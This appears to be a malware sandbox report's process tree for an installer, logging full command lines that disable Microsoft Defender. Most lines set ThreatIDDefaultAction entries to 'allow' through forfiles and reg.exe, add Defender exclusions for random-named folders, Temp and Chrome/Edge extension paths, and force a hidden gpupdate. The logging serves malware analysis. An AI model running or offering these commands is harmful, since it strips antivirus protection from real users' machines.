                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:5488
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4840
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2060
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3272
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:6128
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:6092
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:6076
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5752
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:336
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5736
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6036
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5572
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:1500
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:6060
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5168
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:5564
                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:5928
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5684
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5884
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3196
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:384
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1072
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:6040
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:6140
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:3896
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2820
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2916
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:2392
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5408
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3640
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4504
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5312
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5296
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3340
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1544
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4328
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5584
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:5964
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4504
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5764
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3872
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1484
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5876
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5608
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5296
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:2736
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:336
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:772
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5284
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:3052
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:3512
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5852
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4320
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:5244
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4252
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:5100
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:5900
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS6404.tmp\Install.exe
